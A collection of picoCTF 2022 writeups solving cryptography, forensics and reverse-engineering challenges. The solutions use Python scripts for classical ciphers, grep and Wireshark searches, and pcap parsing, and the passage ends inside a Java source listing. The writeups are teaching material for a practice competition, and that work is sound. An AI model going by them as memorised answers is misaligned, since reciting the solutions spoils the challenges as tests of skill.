        txt_index = universe.index(c.upper())
        key_index = universe.index(key[i % k_len])
        i += 1
        flag += universe[(txt_index - key_index) % uni_len].lower()
    elif c.isupper():
        txt_index = universe.index(c)
        key_index = universe.index(key[i % k_len])
        i += 1
        flag += universe[(txt_index - key_index) % uni_len]
    else:
        flag += c

print(flag)
```

Then make the script executable and run it

```bash
┌──(kali㉿kali)-[/picoCTF/picoCTF_2022/Cryptography/Vigenere]
└─$ chmod +x solve.py

┌──(kali㉿kali)-[/picoCTF/picoCTF_2022/Cryptography/Vigenere]
└─$ ./solve.py
picoCTF{}
```

For additional information, please see the references below.
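Going one step beyond the challenge, which hands you the key: with a Vigenère cipher the known flag prefix is enough to recover the key yourself. Since `picoCTF{` must encrypt to `rgnoDVD{`, subtracting plaintext from ciphertext letter by letter yields the key stream, and the shortest repeating period of that stream is the key. The following is an added example (not the writeup's script) that does exactly that, using the same convention that non-letters pass through unchanged without advancing the key.

```python
#!/usr/bin/env python3
"""Vigenère encryption/decryption plus key recovery from a known-plaintext crib."""
import string

ALPHABET = string.ascii_uppercase
CIPHER_TEXT = "rgnoDVD{O0NU_WQ3_G1G3O3T3_A1AH3S_f85729e7}"   # from the challenge
KNOWN_PREFIX = "picoCTF{"                                    # every flag starts like this


def vigenere(text: str, key: str, decrypt: bool = False) -> str:
    """Shift letters by the key; non-letters pass through and do not consume key."""
    key = key.upper()
    out, k = [], 0
    for c in text:
        if c.isalpha():
            shift = ALPHABET.index(key[k % len(key)])
            if decrypt:
                shift = -shift
            base = ALPHABET if c.isupper() else ALPHABET.lower()
            out.append(base[(base.index(c) + shift) % 26])
            k += 1
        else:
            out.append(c)
    return "".join(out)


def key_stream(cipher_text: str, known_plain: str) -> str:
    """Key letters implied by aligning known_plain with the start of cipher_text."""
    stream = []
    for c, p in zip(cipher_text, known_plain):
        if c.isalpha() != p.isalpha() or (not c.isalpha() and c != p):
            raise ValueError("crib does not fit the ciphertext")
        if c.isalpha():
            stream.append(ALPHABET[(ALPHABET.index(c.upper()) - ALPHABET.index(p.upper())) % 26])
    return "".join(stream)


def shortest_period(stream: str) -> str:
    """Smallest prefix that, repeated, reproduces the whole key stream."""
    for n in range(1, len(stream) + 1):
        if all(stream[i] == stream[i % n] for i in range(len(stream))):
            return stream[:n]
    return stream


def recover_key(cipher_text: str, known_plain: str) -> str:
    """Key as the shortest period of the crib-derived key stream."""
    return shortest_period(key_stream(cipher_text, known_plain))


if __name__ == "__main__":
    key = recover_key(CIPHER_TEXT, KNOWN_PREFIX)
    print("recovered key:", key)
    print(vigenere(CIPHER_TEXT, key, decrypt=True))
```

The seven letters of `picoCTF` give seven key-stream letters, enough to see the five-letter period. With a key longer than the crib `shortest_period` just returns the whole stream; a longer crib, or the classic Kasiski/index-of-coincidence period test on the full ciphertext, is needed then.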

## References

- [python - Linux manual page](https://linux.die.net/man/1/python)
- [Python (programming language) - Wikipedia](https://en.wikipedia.org/wiki/Python_(programming_language))
- [Vigenère cipher - Wikipedia](https://en.wikipedia.org/wiki/Vigen%C3%A8re_cipher)
--------------------------------------------------------------------------------
/picoCTF_2022/Cryptography/basic-mod1.md:
--------------------------------------------------------------------------------
# basic-mod1

- [Challenge information](#challenge-information)
- [Solution](#solution)
- [References](#references)

## Challenge information

```text
Level: Medium
Tags: picoCTF 2022, Cryptography
Author: WILL HONG

Description:
We found this weird message being passed around on the servers, we think we have a working decryption scheme.
Download the message here.

Take each number mod 37 and map it to the following character set: 0-25 is the alphabet (uppercase),
26-35 are the decimal digits, and 36 is an underscore.

Wrap your decrypted message in the picoCTF flag format (i.e. picoCTF{decrypted_message})

Hints:
1. Do you know what mod 37 means?
2. mod 37 means modulo 37. It gives the remainder of a number after being divided by 37.
```

Challenge link: [https://play.picoctf.org/practice/challenge/253](https://play.picoctf.org/practice/challenge/253)

## Solution

Let's use the instructions above to create a small Python script called `get_flag.py` to solve this challenge

```python
#!/usr/bin/python

# Read the encoded flag as string
with open("message.txt", 'r') as fh:
    enc_string = fh.read().strip()

# Convert to array of numbers
enc_numbers = map(int, enc_string.split())

# Create decode array: index 0-25 -> A-Z, 26-35 -> 0-9, 36 -> _
base_37 = []
for i in range(26):
    base_37 += chr(ord('A') + i)
for i in range(10):
    base_37 += chr(ord('0') + i)
base_37 += '_'

# Decode flag and print it
flag = []
for x in enc_numbers:
    flag += base_37[x % 37]
print('picoCTF{%s}' % "".join(flag))
```

Then make the script executable and run it

```bash
┌──(kali㉿kali)-[/picoCTF/picoCTF_2022/Cryptography/Basic_Mod1]
└─$ chmod +x get_flag.py

┌──(kali㉿kali)-[/picoCTF/picoCTF_2022/Cryptography/Basic_Mod1]
└─$ ./get_flag.py
picoCTF{}
```

For additional information, please see the references below.

## References

- [Modulo - Wikipedia](https://en.wikipedia.org/wiki/Modulo)
- [python - Linux manual page](https://linux.die.net/man/1/python)
- [Python (programming language) - Wikipedia](https://en.wikipedia.org/wiki/Python_(programming_language))
--------------------------------------------------------------------------------
/picoCTF_2022/Cryptography/basic-mod2.md:
--------------------------------------------------------------------------------
# basic-mod2

- [Challenge information](#challenge-information)
- [Solution](#solution)
- [References](#references)

## Challenge information

```text
Level: Medium
Tags: picoCTF 2022, Cryptography
Author: WILL HONG

Description:
A new modular challenge! Download the message here.

Take each number mod 41 and find the modular inverse for the result.

Then map to the following character set: 1-26 are the alphabet, 27-36 are the decimal digits,
and 37 is an underscore.

Wrap your decrypted message in the picoCTF flag format (i.e. picoCTF{decrypted_message})

Hints:
1. Do you know what the modular inverse is?
2. The inverse modulo z of x is the number, y that when multiplied by x is 1 modulo z
3. It's recommended to use a tool to find the modular inverses
```

Challenge link: [https://play.picoctf.org/practice/challenge/254](https://play.picoctf.org/practice/challenge/254)

## Solution

The code for this challenge is almost identical to the [previous challenge](basic-mod1.md); the only new piece is the modular inverse.

Python 3.8 and later compute it directly with `pow(x, -1, 41)`. On older versions you need your own implementation, for example the extended Euclidean algorithm discussed on [StackOverflow](https://stackoverflow.com/questions/4798654/modular-multiplicative-inverse-function-in-python). Two things to keep in mind: `pow(x, -1, 41)` raises `ValueError` when `x` has no inverse, i.e. when it is a multiple of 41, and the character set is 1-based this time (1 is `A`), hence the `- 1` when indexing the table.

```python
#!/usr/bin/python

# Read the encoded flag as string
with open("message.txt", 'r') as fh:
    enc_string = fh.read().strip()

# Convert to array of numbers
enc_numbers = map(int, enc_string.split())

# Create decode array
base_37 = []
for i in range(26):
    base_37 += chr(ord('A') + i)
for i in range(10):
    base_37 += chr(ord('0') + i)
base_37 += '_'

# Decode flag and print it
# pow(x, -1, 41) is the modular inverse (Python 3.8+); the character set
# is 1-based this time, hence the - 1
flag = []
for x in enc_numbers:
    flag += base_37[pow(x, -1, 41) - 1]
print('picoCTF{%s}' % "".join(flag))
```

Then make the script executable and run it

```bash
┌──(kali㉿kali)-[/picoCTF/picoCTF_2022/Cryptography/Basic_Mod2]
└─$ chmod +x get_flag.py

┌──(kali㉿kali)-[/picoCTF/picoCTF_2022/Cryptography/Basic_Mod2]
└─$ ./get_flag.py
picoCTF{}
```

For additional information, please see the references below.

## References

- [Modulo - Wikipedia](https://en.wikipedia.org/wiki/Modulo)
- [python - Linux manual page](https://linux.die.net/man/1/python)
- [Python (programming language) - Wikipedia](https://en.wikipedia.org/wiki/Python_(programming_language))
--------------------------------------------------------------------------------
/picoCTF_2022/Cryptography/morse-code.md:
--------------------------------------------------------------------------------
# morse-code

- [Challenge information](#challenge-information)
- [Solution](#solution)
- [References](#references)

## Challenge information

```text
Level: Medium
Tags: picoCTF 2022, Cryptography, morse_code
Author: WILL HONG

Description:
Morse code is well known. Can you decrypt this?

Download the file here.

Wrap your answer with picoCTF{}, put underscores in place of pauses, and use all lowercase.

Hints:
1. Audacity is a really good program to analyze morse code audio.
```

Challenge link: [https://play.picoctf.org/practice/challenge/280](https://play.picoctf.org/practice/challenge/280)

## Solution

I searched for an online service to decode morse-code from audio and found [this one on Data Border](https://databorder.com/transfer/morse-sound-receiver/). It is good at presenting the pauses between the "words".

Create the flag from the output according to the instructions given.

For additional information, please see the references below.

## References

- [Morse code - Wikipedia](https://en.wikipedia.org/wiki/Morse_code)
- [Morse Code Sound & Vibration Listener](https://databorder.com/transfer/morse-sound-receiver/)
--------------------------------------------------------------------------------
/picoCTF_2022/Cryptography/rail-fence.md:
--------------------------------------------------------------------------------
# rail-fence

- [Challenge information](#challenge-information)
- [Solution](#solution)
- [References](#references)

## Challenge information

```text
Level: Medium
Tags: picoCTF 2022, Cryptography
Author: WILL HONG

Description:
A type of transposition cipher is the rail fence cipher, which is described here.

Here is one such cipher encrypted using the rail fence with 4 rails. Can you decrypt it?

Download the message here.

Put the decoded message in the picoCTF flag format, picoCTF{decoded_message}.

Hints:
1. Once you've understood how the cipher works, it's best to draw it out yourself on paper
```

Challenge link: [https://play.picoctf.org/practice/challenge/289](https://play.picoctf.org/practice/challenge/289)

## Solution

Rather than solving this manually I used [this online service at Planet Calc](https://planetcalc.com/6946/).
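As an added example (not the writeup's method, which relied on the Planet Calc page), here is the rail fence worked in Python: the zigzag is expressed as the rail index each character position lands on, encryption reads the rails top to bottom, and decryption puts the characters back into those same positions. `brute_force` tries every rail count up to a limit and reports the ones whose output contains a marker such as the flag prefix, which is what the online solver does. The message used below is a constructed one, since the challenge text is only available as a download.

```python
#!/usr/bin/env python3
"""Rail fence cipher: encrypt, decrypt, and brute-force the number of rails."""
from typing import Iterator, List, Tuple


def rail_pattern(length: int, rails: int) -> List[int]:
    """Rail (row) index visited by each character position of the zigzag."""
    if rails < 2:
        return [0] * length
    cycle = 2 * (rails - 1)           # one down-and-up sweep of the fence
    return [min(i % cycle, cycle - i % cycle) for i in range(length)]


def rail_fence_encrypt(plain: str, rails: int) -> str:
    """Read the rails from top to bottom, each rail left to right."""
    pattern = rail_pattern(len(plain), rails)
    return "".join(plain[i] for r in range(rails)
                   for i in range(len(plain)) if pattern[i] == r)


def rail_fence_decrypt(cipher: str, rails: int) -> str:
    """Invert encryption: ciphertext positions in (rail, column) order map back."""
    pattern = rail_pattern(len(cipher), rails)
    order = sorted(range(len(cipher)), key=lambda i: (pattern[i], i))
    plain = [""] * len(cipher)
    for c, i in zip(cipher, order):
        plain[i] = c
    return "".join(plain)


def brute_force(cipher: str, marker: str, max_rails: int = 10) -> Iterator[Tuple[int, str]]:
    """Yield (rails, candidate) for every rail count whose output contains marker."""
    for rails in range(2, max_rails + 1):
        candidate = rail_fence_decrypt(cipher, rails)
        if marker in candidate:
            yield rails, candidate


# Constructed sample (not the challenge download), encrypted with 4 rails like the challenge
SAMPLE_PLAIN = "WE_ARE_DISCOVERED_FLEE_AT_ONCE"
SAMPLE_CIPHER = rail_fence_encrypt(SAMPLE_PLAIN, 4)

if __name__ == "__main__":
    print("cipher:", SAMPLE_CIPHER)
    for rails, text in brute_force(SAMPLE_CIPHER, "FLEE"):
        print(f"{rails} rails: {text}")
```

For the challenge, call `rail_fence_decrypt(message, 4)` on the downloaded text, or `brute_force(message, "_")` if you did not trust the stated rail count; the marker should be something the plaintext must contain and the ciphertext's other arrangements are unlikely to produce.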

The Planet Calc solver "brute-forces" the number of rails up to a maximum (default 10).

Enter the given encoded text in the `Encoded message` text box and press 'CALCULATE'.
You will get the flag in the output with 4 rails in the `Decode table`.

For additional information, please see the references below.

## References

- [Rail fence cipher - Wikipedia](https://en.wikipedia.org/wiki/Rail_fence_cipher)
- [Transposition cipher - Wikipedia](https://en.wikipedia.org/wiki/Transposition_cipher)
--------------------------------------------------------------------------------
/picoCTF_2022/Cryptography/substitution1.md:
--------------------------------------------------------------------------------
# substitution1

- [Challenge information](#challenge-information)
- [Solution](#solution)
- [References](#references)

## Challenge information

```text
Level: Medium
Tags: picoCTF 2022, Cryptography, Substitution_cipher
Author: WILL HONG

Description:
A second message has come in the mail, and it seems almost identical to the first one.
Maybe the same thing will work again.

Download the message here.

Hints:
1. Try a frequency attack
2. Do the punctuation and the individual words help you make any substitutions?
```

Challenge link: [https://play.picoctf.org/practice/challenge/308](https://play.picoctf.org/practice/challenge/308)

## Solution

The message we were given looks like this (with line breaks added)

```text
WYHg (gzray hra wimybas yzs hvij) ias i yums rh wrombysa gswbakyu wromsykykrl. Wrlysgyilyg ias
masgslysn dkyz i gsy rh wzivvsljsg dzkwz ysgy yzska wasiykxkyu, yswzlkwiv (iln jrrjvklj) gckvvg,
iln marqvso-grvxklj iqkvkyu. Wzivvsljsg bgbivvu wrxsa i lboqsa rh wiysjraksg, iln dzsl grvxsn,
siwz uksvng i gyaklj (wivvsn i hvij) dzkwz kg gbqokyysn yr il rlvkls gwraklj gsaxkws. WYHg ias
i jasiy diu yr vsial i dkns iaaiu rh wrombysa gswbakyu gckvvg kl i gihs, vsjiv slxkarlosly, iln
ias zrgysn iln mviusn qu oilu gswbakyu jarbmg iarbln yzs dravn hra hbl iln maiwykws.
Hra yzkg marqvso, yzs hvij kg: mkwrWYH{HA3FB3LWU_4774WC5_4A3_W001_7II384QW}
```

Compared to the [previous challenge](substitution0.md) there is no key this time.

Even without a solver you get a head start from a crib: the flag prefix `mkwrWYH{` must decode to `picoCTF{`, which fixes `m→p`, `k→i`, `w→c`, `r→o`, `y→t` and `h→f` at once (the cipher preserves case, so `WYHg` at the very start is `CTFs`). Letter frequencies and word shapes (hint 2) then give the rest.

Let's use [quipqiup](https://quipqiup.com/) to solve this as before.

Input the entire message in the `Puzzle` text field and press `Solve` (with the default setting).

After a short while, you have the flag at the top of the possible solutions.

For additional information, please see the references below.

## References

- [Frequency analysis - Wikipedia](https://en.wikipedia.org/wiki/Frequency_analysis)
- [Letter frequency - Wikipedia](https://en.wikipedia.org/wiki/Letter_frequency)
- [Quipqiup - A fast and automated cryptogram solver](https://quipqiup.com/)
- [Substitution cipher - Wikipedia](https://en.wikipedia.org/wiki/Substitution_cipher)
--------------------------------------------------------------------------------
/picoCTF_2022/Cryptography/transposition-trial.md:
--------------------------------------------------------------------------------
# transposition-trial

- [Challenge information](#challenge-information)
- [Solution](#solution)
- [References](#references)

## Challenge information

```text
Level: Medium
Tags: picoCTF 2022, Cryptography, cryptography
Author: WILL HONG

Description:
Our data got corrupted on the way here.
Luckily, nothing got replaced, but every block of 3 got scrambled around!

The first word seems to be three letters long, maybe you can use that to recover the rest of the message.
Download the corrupted message here.

Hints:
1. Split the message up into blocks of 3 and see how the first block is scrambled
```

Challenge link: [https://play.picoctf.org/practice/challenge/312](https://play.picoctf.org/practice/challenge/312)

## Solution

The message given looks like this

```text
heTfl g as iicpCTo{7F4NRP051N5_16_35P3X51N3_V091B0AE}2
```

Comparing the first block `heT` with the three-letter first word `The` shows that, within each block of three, the first plaintext character has been moved to the end (`The` → `heT`). Decryption therefore takes the third ciphertext character of each block first, followed by the first and the second.

Let's write a small Python script called `solve.py` to decode this

```python
#!/usr/bin/python
# -*- coding: latin-1 -*-

encrypted_msg = "heTfl g as iicpCTo{7F4NRP051N5_16_35P3X51N3_V091B0AE}2"

i = 0
flag = ""

# The message length (54) is a multiple of 3; a trailing partial block
# would raise an IndexError here
while i < len(encrypted_msg):
    flag += encrypted_msg[i+2]
    flag += encrypted_msg[i]
    flag += encrypted_msg[i+1]
    i += 3

print(flag)
```

Then make the script executable and run it

```bash
┌──(kali㉿kali)-[/picoCTF/picoCTF_2022/Cryptography/Transposition_trial]
└─$ chmod +x solve.py

┌──(kali㉿kali)-[/picoCTF/picoCTF_2022/Cryptography/Transposition_trial]
└─$ ./solve.py
The flag is picoCTF{}
```

For additional information, please see the references below.
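Generalising the step above, as an added example that is not the writeup's script: instead of hard-coding the `[2, 0, 1]` read order, derive the block permutation from the known first word and apply its inverse to every block, so the same code handles any scrambling of any block size and refuses input that cannot be right. The ciphertext is the one from the challenge; the crib `The` is the first word the description points at.

```python
#!/usr/bin/env python3
"""Undo a fixed per-block permutation, recovering the permutation from a crib."""
from typing import List

CIPHER_TEXT = "heTfl g as iicpCTo{7F4NRP051N5_16_35P3X51N3_V091B0AE}2"   # from the challenge
CRIB = "The"                                                           # known first word


def recover_permutation(cipher_block: str, plain_block: str) -> List[int]:
    """perm[k] = position in the plaintext block of the k-th ciphertext character."""
    if len(cipher_block) != len(plain_block) or sorted(cipher_block) != sorted(plain_block):
        raise ValueError("crib is not a rearrangement of the first block")
    if len(set(plain_block)) != len(plain_block):
        raise ValueError("crib has repeated characters, permutation is ambiguous")
    return [plain_block.index(c) for c in cipher_block]


def unscramble(cipher: str, perm: List[int]) -> str:
    """Apply the inverse permutation to each block; a short last block is an error."""
    size = len(perm)
    if len(cipher) % size:
        raise ValueError(f"ciphertext length {len(cipher)} is not a multiple of {size}")
    out = []
    for start in range(0, len(cipher), size):
        block = cipher[start:start + size]
        plain = [""] * size
        for k, c in enumerate(block):
            plain[perm[k]] = c
        out.append("".join(plain))
    return "".join(out)


def solve(cipher: str = CIPHER_TEXT, crib: str = CRIB) -> str:
    """Recover the permutation from the first block and unscramble the whole message."""
    perm = recover_permutation(cipher[:len(crib)], crib)
    return unscramble(cipher, perm)


if __name__ == "__main__":
    print(solve())
```

For the challenge `recover_permutation("heT", "The")` returns `[1, 2, 0]`: the ciphertext's first character belongs at plaintext position 1, its second at position 2 and its third at position 0, which is the same `[i+2], [i], [i+1]` order the script above uses.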

## References

- [python - Linux manual page](https://linux.die.net/man/1/python)
- [Python (programming language) - Wikipedia](https://en.wikipedia.org/wiki/Python_(programming_language))
- [Transposition cipher - Wikipedia](https://en.wikipedia.org/wiki/Transposition_cipher)
--------------------------------------------------------------------------------
/picoCTF_2022/Forensics/Disk_mounted_in_FTK_Imager.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Cajac/picoCTF-Writeups/9c46923d83fc95b5aa66e7e41df3b163bc512fee/picoCTF_2022/Forensics/Disk_mounted_in_FTK_Imager.png
--------------------------------------------------------------------------------
/picoCTF_2022/Forensics/Lookey_here.md:
--------------------------------------------------------------------------------
# Lookey here

- [Challenge information](#challenge-information)
- [Solution](#solution)
- [References](#references)

## Challenge information

```text
Level: Medium
Tags: picoCTF 2022, Forensics, grep
Author: LT 'SYREAL' JONES / MUBARAK MIKAIL

Description:
Attackers have hidden information in a very large mass of data in the past, maybe they are still doing it.

Download the data here.

Hints:
1. Download the file and search for the flag based on the known prefix.
```

Challenge link: [https://play.picoctf.org/practice/challenge/279](https://play.picoctf.org/practice/challenge/279)

## Solution

The most efficient way to get the flag is to use `grep` with `-o` to only output the matched text
and `-E` to say that your pattern is an extended regular expression

```bash
┌──(kali㉿kali)-[/picoCTF/picoCTF_2022/Forensics/Lookey_here]
└─$ grep -oE 'picoCTF{.*}' anthem.flag.txt
picoCTF{}
```

Note that `.*` is greedy: if a line contained a stray `}` after the flag, the match would run on to the last `}` on that line. `grep -oE 'picoCTF\{[^}]*\}'` stops at the first closing brace and is the safer habit.

For additional information, please see the references below.

## References

- [grep - Linux manual page](https://man7.org/linux/man-pages/man1/grep.1.html)
--------------------------------------------------------------------------------
/picoCTF_2022/Forensics/Packets_Primer.md:
--------------------------------------------------------------------------------
# Packets Primer

- [Challenge information](#challenge-information)
- [Solution](#solution)
- [References](#references)

## Challenge information

```text
Level: Medium
Tags: picoCTF 2022, Forensics, pcap
Author: LT 'SYREAL' JONES

Description:
Download the packet capture file and use packet analysis software to find the flag.

Hints:
1. Wireshark, if you can install and use it, is probably the most beginner friendly packet analysis software product.
```

Challenge link: [https://play.picoctf.org/practice/challenge/286](https://play.picoctf.org/practice/challenge/286)

## Solution

Open up the PCAP-file in [Wireshark](https://www.wireshark.org/).

On easier challenges it can sometimes be worth searching for the flag in plaintext by entering a display filter of `tcp.payload contains "picoCTF"`. And it works here too. Packet number 4 matches and contains the flag. Keep in mind that this filter only matches when the whole string sits inside a single segment; a flag split across two packets needs Follow → TCP Stream (or a search over the reassembled stream) instead.
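The same `tcp.payload contains "picoCTF"` search done with the standard library alone, as an added example (not the writeup's method, which used Wireshark): handy on a box without Wireshark or tshark. It parses the classic libpcap record format, walks the Ethernet/IPv4/TCP headers, and reports the frame numbers (counted from 1, like Wireshark) whose TCP payload contains the marker. The capture it runs on is constructed inline; pass a real `.pcap` path as the argument to scan that instead.

```python
#!/usr/bin/env python3
"""Find TCP payloads containing a marker in a classic (libpcap) capture file."""
import struct
import sys
from typing import Iterator, List, Tuple


def iter_frames(data: bytes) -> Iterator[Tuple[int, bytes]]:
    """Yield (frame_number, frame_bytes) for each record; numbering starts at 1."""
    magic = struct.unpack("<I", data[:4])[0]
    if magic in (0xA1B2C3D4, 0xA1B23C4D):        # little-endian file (usec / nsec stamps)
        endian = "<"
    elif magic in (0xD4C3B2A1, 0x4D3CB2A1):      # big-endian file
        endian = ">"
    else:
        raise ValueError("not a classic pcap file (pcapng is not supported here)")
    linktype = struct.unpack(endian + "I", data[20:24])[0]
    if linktype != 1:                              # LINKTYPE_ETHERNET
        raise ValueError(f"unsupported link type {linktype}")
    offset, number = 24, 1
    while offset + 16 <= len(data):
        _sec, _usec, incl_len, _orig_len = struct.unpack(endian + "IIII", data[offset:offset + 16])
        offset += 16
        yield number, data[offset:offset + incl_len]
        offset += incl_len
        number += 1


def tcp_payload(frame: bytes) -> bytes:
    """TCP payload of an Ethernet/IPv4/TCP frame, or b"" if the frame is something else."""
    if len(frame) < 14 or frame[12:14] != b"\x08\x00":      # EtherType must be IPv4
        return b""
    ip = frame[14:]
    if len(ip) < 20 or ip[0] >> 4 != 4:
        return b""
    ihl = (ip[0] & 0x0F) * 4
    total_len = struct.unpack("!H", ip[2:4])[0]
    if ip[9] != 6:                                            # protocol must be TCP
        return b""
    tcp = ip[ihl:total_len]
    if len(tcp) < 20:
        return b""
    data_off = (tcp[12] >> 4) * 4
    return tcp[data_off:]


def find_marker(data: bytes, marker: bytes = b"picoCTF") -> List[Tuple[int, bytes]]:
    """(frame_number, payload) for every frame whose TCP payload contains marker."""
    return [(n, p) for n, f in iter_frames(data) for p in [tcp_payload(f)] if marker in p]


def build_frame(payload: bytes, proto: int = 6) -> bytes:
    """Constructed Ethernet/IPv4/TCP frame carrying payload (checksums left zero)."""
    eth = bytes(6) + bytes(6) + b"\x08\x00"
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 0, 0, 64, proto, 0,
                     bytes([10, 0, 0, 1]), bytes([10, 0, 0, 2]))
    tcp = struct.pack("!HHIIBBHHH", 1234, 80, 0, 0, 5 << 4, 0x18, 0xFFFF, 0, 0)
    return eth + ip + tcp + payload


def build_pcap(frames: List[bytes]) -> bytes:
    """Constructed little-endian pcap: 24-byte global header plus 16-byte record headers."""
    head = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    return head + b"".join(struct.pack("<IIII", 0, 0, len(f), len(f)) + f for f in frames)


# Constructed capture (not the challenge file): the marker is in frame 4 only
SAMPLE_PCAP = build_pcap([
    build_frame(b"GET / HTTP/1.1\r\nHost: example\r\n\r\n"),
    build_frame(b"nothing to see here"),
    build_frame(b"ping", proto=17),                          # UDP-looking frame, skipped
    build_frame(b"here you go: picoCTF{constructed_example}\n"),
])

if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_PCAP
    for number, payload in find_marker(blob):
        print(f"frame {number}: {payload!r}")
```

Like the display filter, this only finds the marker when it lies within one segment, and the minimal parser skips VLAN-tagged frames, IPv6 and pcapng files; `tshark -r capture.pcap -Y 'tcp.payload contains "picoCTF"'` covers those cases when it is available.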

To construct/copy the flag you can either

- See the packet's ASCII-details and construct the flag manually
- Right-click on the 60-bytes of data and select Copy -> ...as Printable Text

For additional information, please see the references below.

## References

- [Wireshark - Homepage](https://www.wireshark.org/)
- [Wireshark display filter syntax and reference](https://www.wireshark.org/docs/man-pages/wireshark-filter.html)
--------------------------------------------------------------------------------
/picoCTF_2022/Forensics/README.md:
--------------------------------------------------------------------------------
# Forensics Challenges

## Medium Forensics Challenges

- [Enhance!](Enhance.md)
- [File types](File_types.md)
- [Lookey here](Lookey_here.md)
- [Packets Primer](Packets_Primer.md)
- [Redaction gone wrong](Redaction_gone_wrong.md)
- [Sleuthkit Apprentice](Sleuthkit_Apprentice.md)
- [Sleuthkit Intro](Sleuthkit_Intro.md)
--------------------------------------------------------------------------------
/picoCTF_2022/Forensics/Redaction_gone_wrong.md:
--------------------------------------------------------------------------------
# Redaction gone wrong

- [Challenge information](#challenge-information)
- [Solution](#solution)

## Challenge information

```text
Level: Medium
Tags: picoCTF 2022, Forensics
Author: MUBARAK MIKAIL

Description:
Now you DON'T see me.
This report has some critical data in it, some of which have been redacted correctly, while some were not.

Can you find an important key that was not redacted properly?

Hints:
1. How can you be sure of the redaction?
```

Challenge link: [https://play.picoctf.org/practice/challenge/290](https://play.picoctf.org/practice/challenge/290)

## Solution

Open up the PDF-document in any PDF-reader that enables you to select and copy all text in the document.

Then paste it into a text editor and you will get (apart from the flag redacted here)

```text
Financial Report for ABC Labs, Kigali, Rwanda for the year 2021.
Breakdown - Just painted over in MS word.
Cost Benefit Analysis
Credit Debit
This is not the flag, keep looking
Expenses from the
picoCTF{}
Redacted document.
```

The document says it itself: a black box drawn over text in a word processor only hides the glyphs visually, the text stays in the PDF's content stream and comes straight back out with select-all and copy. Proper redaction removes the text before the file is produced.
--------------------------------------------------------------------------------
/picoCTF_2022/README.md:
--------------------------------------------------------------------------------
# picoCTF 2022 Challenges

## Binary Exploitation Challenges

### Medium Binary Exploitation Challenges

- [basic-file-exploit](Binary_Exploitation/basic-file-exploit.md)
- [buffer overflow 0](Binary_Exploitation/buffer_overflow_0.md)
- [buffer overflow 1](Binary_Exploitation/buffer_overflow_1.md)
- [buffer overflow 2](Binary_Exploitation/buffer_overflow_2.md)
- [CVE-XXXX-XXXX](Binary_Exploitation/CVE-XXXX-XXXX.md)
- [RPS](Binary_Exploitation/RPS.md)

## Cryptography Challenges

### Medium Cryptography Challenges

- [basic-mod1](Cryptography/basic-mod1.md)
- [basic-mod2](Cryptography/basic-mod2.md)
- [credstuff](Cryptography/credstuff.md)
- [morse-code](Cryptography/morse-code.md)
- [rail-fence](Cryptography/rail-fence.md)
- [substitution0](Cryptography/substitution0.md)
- [substitution1](Cryptography/substitution1.md)
- [substitution2](Cryptography/substitution2.md)
- [transposition-trial](Cryptography/transposition-trial.md)
- [Vigenere](Cryptography/Vigenere.md)

## Forensics Challenges

### Medium Forensics Challenges

- [Enhance!](Forensics/Enhance.md)
- [File types](Forensics/File_types.md)
- [Lookey here](Forensics/Lookey_here.md)
- [Packets Primer](Forensics/Packets_Primer.md)
- [Redaction gone wrong](Forensics/Redaction_gone_wrong.md)
- [Sleuthkit Apprentice](Forensics/Sleuthkit_Apprentice.md)
- [Sleuthkit Intro](Forensics/Sleuthkit_Intro.md)

## Reverse Engineering Challenges

### Medium Reverse Engineering Challenges

- [bloat.py](Reverse_Engineering/bloat.py.md)
- [file-run1](Reverse_Engineering/file-run1.md)
- [file-run2](Reverse_Engineering/file-run2.md)
- [Fresh Java](Reverse_Engineering/Fresh_Java.md)
- [GDB Test Drive](Reverse_Engineering/GDB_Test_Drive.md)
- [patchme.py](Reverse_Engineering/patchme.py.md)
- [Safe Opener](Reverse_Engineering/Safe_Opener.md)
- [unpackme.py](Reverse_Engineering/unpackme.py.md)

## Web Exploitation Challenges

### Easy Web Exploitation Challenges

- [Includes](Web_Exploitation/Includes.md)
- [Inspect HTML](Web_Exploitation/Inspect_HTML.md)
- [Local Authority](Web_Exploitation/Local_Authority.md)

### Medium Web Exploitation Challenges

- [Forbidden Paths](Web_Exploitation/Forbidden_Paths.md)
- [Power Cookie](Web_Exploitation/Power_Cookie.md)
- [Roboto Sans](Web_Exploitation/Roboto_Sans.md)
- [Search source](Web_Exploitation/Search_source.md)
- [Secrets](Web_Exploitation/Secrets.md)
--------------------------------------------------------------------------------
/picoCTF_2022/Reverse_Engineering/GDB_Layout_Asm.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Cajac/picoCTF-Writeups/9c46923d83fc95b5aa66e7e41df3b163bc512fee/picoCTF_2022/Reverse_Engineering/GDB_Layout_Asm.png
--------------------------------------------------------------------------------
/picoCTF_2022/Reverse_Engineering/README.md:
--------------------------------------------------------------------------------

# Reverse Engineering Challenges

## Medium Reverse Engineering Challenges

- [bloat.py](bloat.py.md)
- [file-run1](file-run1.md)
- [file-run2](file-run2.md)
- [Fresh Java](Fresh_Java.md)
- [GDB Test Drive](GDB_Test_Drive.md)
- [patchme.py](patchme.py.md)
- [Safe Opener](Safe_Opener.md)
- [unpackme.py](unpackme.py.md)

--------------------------------------------------------------------------------
/picoCTF_2022/Reverse_Engineering/Safe_Opener.md:
--------------------------------------------------------------------------------

# Safe Opener

- [Challenge information](#challenge-information)
- [Solution](#solution)
- [References](#references)

## Challenge information

```text
Level: Medium
Tags: picoCTF 2022, Reverse Engineering
Author: MUBARAK MIKAIL

Description:
Can you open this safe?

I forgot the key to my safe but this program is supposed to help me with retrieving the lost key.
Can you help me unlock my safe?

Put the password you recover into the picoCTF flag format like:
picoCTF{password}

Hints:
(None)
```

Challenge link: [https://play.picoctf.org/practice/challenge/294](https://play.picoctf.org/practice/challenge/294)

## Solution

Let's start by looking at the Java source code

```java
import java.io.*;
import java.util.*;
public class SafeOpener {
    public static void main(String args[]) throws IOException {
        BufferedReader keyboard = new BufferedReader(new InputStreamReader(System.in));
        Base64.Encoder encoder = Base64.getEncoder();
        String encodedkey = "";
        String key = "";
        int i = 0;
        boolean isOpen;

        while (i < 3) {
            System.out.print("Enter password for the safe: ");
            key = keyboard.readLine();

            encodedkey = encoder.encodeToString(key.getBytes());
            System.out.println(encodedkey);

            isOpen = openSafe(encodedkey);
            if (!isOpen) {
